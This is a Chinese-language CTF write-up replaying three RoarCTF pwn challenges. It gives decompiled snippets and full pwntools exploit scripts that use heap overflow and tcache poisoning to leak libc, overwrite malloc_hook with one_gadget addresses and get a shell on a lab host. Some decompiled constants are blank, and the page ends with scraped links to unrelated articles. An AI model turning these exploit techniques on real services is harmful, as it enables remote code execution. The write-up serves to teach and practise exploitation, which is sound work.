1、easy_pwn

  可以利用的点:

  

__int64 __fastcall sub_E26(signed int a1, unsigned int a2)

{

  __int64 result; // rax

  if ( a1 > (signed int)a2 )

    return a2;

  if ( a2 - a1 ==  )

    LODWORD(result) = a1 + ;

  else

    LODWORD(result) = a1;

  return (unsigned int)result;

}

然后 覆盖了 下一个chunk的 size ,然后就是 像之前的0ctf2017的babyheap程序

具体可以参考这里

https://bbs.pediy.com/thread-246786.htm

payload:

#!/usr/bin/env python

# -*- coding: utf-8 -*-

from pwn import *

context.log_level = 'debug'

host = "192.168.244.153"

port = 8888

#r = process("")

r = remote(host,port)

def add(size):

    r.recvuntil("choice: ")

    r.sendline(str(1))

    r.recvuntil("size: ")

    r.sendline(str(size))

def edit(index,size,content):

    r.recvuntil("choice: ")

    r.sendline(str(2))

    r.recvuntil("index: ")

    r.sendline(str(index))

    r.recvuntil("size: ")

    r.sendline(str(size))

    r.recvuntil("content: ")

    r.sendline(content)

def free(index):

    r.recvuntil("choice: ")

    r.sendline(str(3))

    r.recvuntil("index: ")

    r.sendline(str(index))

def show(index):

    r.recvuntil("choice: ")

    r.sendline(str(4))

    r.recvuntil("index: ")

    r.sendline(str(index))

add(0x68)#

add(0x68)#

add(0x68)#

add(0x68)#

add(0x68)#

add(0x68)#

payload = 'a'*0x68+p8(0xe1)

edit(0,0x68+0xa,payload)

free(1)

add(0x68)#

show(2)

r.recvuntil(": ")

leak = u64(r.recv(6).ljust(8,'\x00'))

libc = leak - 0x3c4b78

print "libc:"+hex(libc)

free_hook = libc +0x3c67a8

malloc_hook = libc +0x3c4b10

ong_a = libc + 0x4526a

realloc_hook = libc +0x846C0

payload = p64(malloc_hook -0x23)

add(0x60)#

free(2)

edit(6,8,payload)

add(0x60)#

add(0x60)#

payload = 'a'*0xb+p64(ong_a)+p64(realloc_hook)

edit(7,len(payload),payload)

add(0x68)

r.interactive()

2、realloc_magic

  程序:

 

int fr()

{

  free(realloc_ptr);

  return puts("Done");

}
int ba()

{

  if ( lock )

    exit(-);

  lock = ;

  realloc_ptr = 0LL;

  return puts("Done");

}
int re()

{

  size_t size; // [rsp+Ch] [rbp-4h]

  puts("Size?");

  LODWORD(size) = get_int("Size?");

  realloc_ptr = realloc(realloc_ptr, (unsigned int)size);

  puts("Content?");

  read(, realloc_ptr, (unsigned int)size);

  return puts("Done");

}

没有malloc ,这道题可以修改tcache的内容,因为tache 就在heap的最上面可以修改几个字节就星

首先 用double free  realloc到 tcache去和修改一个chunk的大小,然后free掉 jiu可以 放到unsortbin去接下来就去布局了 继续realloc 的话就会从unsortdbin上扣出来,好像是。。。

既然修改到tcache去,就可以修改tcache 的chunk,这样就可以修改一个tcache中的chunk 指向IO_2_1_stdin去。接下来在用666

接下来就常规操作

我就参考了两个wp

都实现了下

payload:

  

#!/usr/bin/env python

# -*- coding: utf-8 -*-

from pwn import *

import random

context.log_level = 'debug'

#host = "192.168.244.158"

host = '127.0.0.1'

port = 8888

#r = process("")

r = remote(host,port)

def dele():

    r.recvuntil(">> ")

    r.sendline(str(2))

def realloc_(size,content):

    r.recvuntil(">> ")

    r.sendline(str(1))

    r.recvuntil("Size?")

    r.sendline(str(size))

    r.recvuntil("Content?")

    r.send(content)

def lock_666():

    r.recvuntil(">> ")

    r.sendline(str(666))

#realloc_(0x70,'a')

#realloc_(0,'')

#realloc_(0x100,'a')

#realloc_(0,'')

#realloc_(0xe0,'a')

#realloc_(0,'a')

#realloc_(0x100,'a')

#[dele() for i in range(7)]

#realloc_(0x0,'')

#realloc_(0x70,'a')

#realloc_(0x180,chr(0)*0x78+p64(0x41)+p16(0x9760-0x43))

#realloc_(0,'')

#realloc_(0x100,'a')

#realloc_(0,'')

#realloc_(0x100,'a'*0x43+p64(0xfbad1887) + p64(0) *3 + "\x00")

#leak=u64(r.recvuntil("realloc")[9:9+6].ljust(8,'\x00'))

#leak=u64(r.recv(6).rjust(8,'\x00'))

#print hex(leak)

#libc = leak - 0x3ed8b0

#lock_666()

#realloc_(0x70,'a')

#realloc_(0,'')

#realloc_(0x110,'a')

#realloc_(0,'')

#realloc_(0xf0,'a')

#realloc_(0,'a')

#realloc_(0x110,'a')

#[dele() for i in range(7)]

#realloc_(0x0,'')

#realloc_(0x70,'a')

#realloc_(0x190,chr(0) * 0x78 + p64(0x41) + p64(libc + 0x3ed8e8))

#realloc_(0x0,'')

#print hex(libc)

#realloc_(0x110,'a')

#realloc_(0,'')

#ong_g = libc + 0x4f322

#realloc_(0x110,p64(ong_g))

#r.sendline(str(2))

realloc_(0x28,'a')

dele()

realloc_(0x68,'n')

dele()

realloc_(0x18,'n')

realloc_(0,'')

realloc_(0x48,'a')

dele()

realloc_(0,'')

realloc_(0x68,'a'*0x18+p64(0x201)+p16(0x7010))

realloc_(0,'')

realloc_(0x48,'s')

realloc_(0,'')

realloc_(0x48,'\xff'*0x38+p64(0x31))

realloc_(0x58, 'a' * 0x18 + ' ' *0x20 + p64(0x41)+p64(0) +p16(0x7050))

realloc_(0,'')

realloc_(0x28,p64(0)*4+p16(0x072d)+p8(0xdd))

realloc_(0,'')

realloc_(0x58,'a'*0x33+p64(0xfbad3c80)+p64(0)*3+chr(0))

leak=u64(r.recvuntil("realloc")[9:9+6].ljust(8,'\x00'))

print hex(leak)

libc = leak - 0x3ed8b0

#realloc_(0,'')

#realloc_(0x1e8,p64(0)*4+p16(0x072d)+p8(0xdd))

#realloc_(0,'')

#realloc_(0x58,'a'*0x13+p64(0xfbad3c80)+p64(0)*3+chr(0))

#result=r.recvn(8)

#realloc_(0x50,  'a' * 0x18 + ' ' * 0x20 + p64(0x201)+ p16(0x7060))

#realloc_(0,'')

#realloc_(0x18,p64(0)+p64(0x1f1)+p16(0x072d)+p8(0xdd))

#realloc_(0,'')

#realloc_(0x28,'a')

#realloc_(0x1e8,'a')

#realloc_(0x1e8,p16(0x072d)+p8(0xdd))

r.sendline(str(666))

realloc_(0x38,p64(0)+p64(libc+0x3ed8e8))

realloc_(0,'')

ong_g = libc+0x4f322

realloc_(0x28,p64(ong_g))

r.sendline('')

r.interactive()

#realloc_(0x50,'p'*0x33+p64(0xfbad3c80)+p64(0)*3+chr(0))

#leak=u64(r.recvuntil("realloc")[9:9+6].ljust(8,'\x00'))

#print hex(leak)

r.interactive()

easy_heap:

  这道 只有show了一次就关了  stdou 和stderr

  所以  其实就是劫持 bss上的 ,然后可以修改,在bss上伪造一个 unsortbin ,然后释放 就有了libc的地址,但是要用 那个给的realloc的 卡住,就能泄露出来了

  我是在本地调试的。

payload:

#!/usr/bin/env python

# -*- coding: utf-8 -*-

from pwn import *

context.log_level='debug'

host = "192.168.244.158"

port = 8888

r = remote(host,port)

r.recvuntil("please input your username:")

r.sendline('yezi')

r.recvuntil("please input your info:")

r.sendline('lan')

def add2(size,content):

    sleep(0.1)

    r.sendline(str(1))

    sleep(0.1)

    r.send(str(size).ljust(8, '\x00'))

    sleep(0.3)

    r.send(content)

def add(size,content):

    r.recvuntil(">> ")

    r.sendline(str(1))

    r.recvuntil("input the size")

    r.sendline(str(size))

    r.recvuntil("please input your content")

    r.sendline(content)

def free2():

    sleep(0.2)

    r.sendline(str(2))

def free():

    r.recvuntil(">> ")

    r.sendline(str(2))

def show():

    r.recvuntil(">> ")

    r.sendline(str(3))

def e_666(chosn,content):

    r.recvuntil(">> ")

    r.sendline(str(666))

    r.recvuntil("build or free?")

    if chosn == 1:

        r.sendline(str(1))

        r.recvuntil("please input your content")

        r.sendline(content)

    else:

        r.sendline(str(2))

add(0x50,'a')#

add(0x50,'b')#

add(0x50,'c')#

free()

free()

add(0x50,p64(0x602080))

add(0x50,'a')

payload = 0xdeadbeefdeadbeef

add(0x50,p64(0)+p64(0x6020b0)+p64(payload)+p64(0)+p64(0)+p64(0xb1))

e_666(1,'a')

[free() for i in range(7)]

add(0x70,'a')

e_666(0,'a')

add(0x8,'aaaaaaa')

show()

r.recvuntil("\n")

libc = u64(r.recv(6).ljust(0x8,'\x00')) -0x3ebd40

log.info(hex(libc))

malloc_hook = libc + 0x3ebc30

free_hook = libc +0x3ed8e8

system = libc +0x4f440

add2(0x40,'aa')

free2()

free2()

add2(0x40,p64(malloc_hook-0x8))

add2(0x40,p64(malloc_hook-0x8))

#payload = p64(system)

payload = p64(libc+0x4f322)+p64(libc+0x98c30+9)

add2(0x40,payload)

add2(0x40,'touch 1.txt|cat flag > 1.txt')

r.interactive()

  

参考:https://www.anquanke.com/post/id/188785#h3-6

Roarctf 几道pwn 复现的更多相关文章

  1. [零基础学IoT Pwn] 复现Netgear WNAP320 RCE

    [零基础学IoT Pwn] 复现Netgear WNAP320 RCE 0x00 前言: 这是[零基础学IoT Pwn]的第二篇,上篇我们搭好了仿真环境后,模拟运行了Netgear WNAP320固件 ...

  2. 强网杯2018 pwn复现

    前言 本文对强网杯 中除了 2 个内核题以外的 6 个 pwn 题的利用方式进行记录.题目真心不错 程序和 exp: https://gitee.com/hac425/blog_data/blob/m ...

  3. D^3ctf两道 pwn

    这次 的D^3ctf 又是给吊打 难顶... 所以题都是赛后解出来的,在这感谢Peanuts师傅 unprintableV 看看保护: 看看伪代码,其实代码很少 void __cdecl menu() ...

  4. 2019CISCN华南线下两道web复现

    原帖地址 : https://xz.aliyun.com/t/5558 2019CISCN华南线下的两个简单 web 部分题目下载地址,有的不完整 : 点我点我 web 1 考点 : 无参函数的 RC ...

  5. [RoarCTF 2019]simple_uplod

    目录 [RoarCTF 2019]simple_uplod 1.ThinkPHP文件上传 2.upload()多文件上传 ThinkPHP上传文件名暴破 [RoarCTF 2019]simple_up ...

  6. [RoarCTF]Easy Java

    目录 [RoarCTF]Easy Java 知识点 1.WEB-INF/web.xml泄露 [RoarCTF]Easy Java 题目复现链接:https://buuoj.cn/challenges ...

  7. [RoarCTF]Easy Calc

    目录 [RoarCTF]Easy Calc 知识点 1.http走私绕过WAF 2.php字符串解析特性绕过WAF 3.绕过过滤写shell [RoarCTF]Easy Calc 题目复现链接:htt ...

  8. HGAME2021 week2 pwn writeup

    week2一共有4道pwn题 killerqueen 有格式化字符串漏洞,题不算难,但是故事情节真实让人摸不着头脑,但是仔细分析分析,理清楚逻辑就可以做了. 第一次choose1的时候,可以输入0,泄 ...

  9. ISCC2016 WriteUp

    日期: 2016-05-01~ 注:隔了好久才发布这篇文章,还有两道Pwn的题没放,过一阵子放上.刚开始做这个题,后来恰巧赶上校内CTF比赛,就把重心放在了那个上面. 这是第一次做类似于CTF的题,在 ...

随机推荐

  1. Python 调用图灵机器人 API

    ''' Python3''' import requests #导入requests库 import json #导入json库 key = '3119f1e3610f42c5977ea73c4097 ...

  2. django测试开发-1.开始Hello django!

    用python开发出一个web页面的时候,需要找一个支持python语言的web框架.django框架有丰富的文档和学习资料,也是非常成熟的web开发框架,本篇写一个简单的“hello django! ...

  3. 计算机网络(1)- TCP

    TCP的全称是传输控制协议(Transmission Control Protocol)[RFC 793] TCP提供面向连接的服务.在传送数据之前必须先建立连接,数据传送结束后要释放连接.TCP不提 ...

  4. Java基础(二十三)集合(6)Map集合

    Map接口作为Java集合框架中的第二类接口,其子接口为SortedMap接口,SortedMap接口的子接口为NavigableMap接口. 实现了Map接口具体类有:HashMap(子类Linke ...

  5. Spring之Zuul初步使用(十)

    一.zuul是什么 zuul 是netflix开源的一个API Gateway 服务器, 本质上是一个web servlet应用. Zuul 在云平台上提供动态路由,监控,弹性,安全等边缘服务的框架. ...

  6. C语言中为什么float型数据的范围是3.4E-38~3.4E+38

    因为float所占的位数决定了他的大小位数就是计算机的存储所需要的bit多少32位浮点,64位双精度浮点范围不同//////////////////////以前学计算系统基础的时候有这么个说法计算机存 ...

  7. 从函数计算架构看 Serverless 的演进与思考

    作者 | 杨皓然  阿里巴巴高级技术专家 导读:云计算之所以能够成为 DT 时代颠覆性力量,是因为其本质是打破传统架构模式.降低成本并简化体系结构,用全新的思维更好的满足了用户需求.而无服务器计算(S ...

  8. Dijkstra算法 笔记与思路整理

    该文章可能存在硬伤与不妥,不能作为教程阅读.(因为我真的鶸 Dij作为单源最短路算法,需要先确定一个起点.Dij的函数主体为维护每个节点的dis和vis两个变量.dis表示该点距离起点的最短路权值和, ...

  9. 读书笔记-《Maven实战》-2018/5/3

    5.7依赖调解 1.当一个项目有以下依赖关系的时候:A->B->C->X(1.0).A->D->X(2.0),X作为A的传递依赖而拥有两个版本,Maven为了解决以上问题 ...

  10. 和35岁刘阿姨一起自测 Python 流程控制基本功

    0.突然降临的困惑 流程控制语句.布尔值.布尔值操作符都属于 python 的基础功.大好周末我写这篇笔记,不是为了整理这些基础知识点,而是记录几个令我突然迷惑的代码段.--代码本身很简单,但即便已经 ...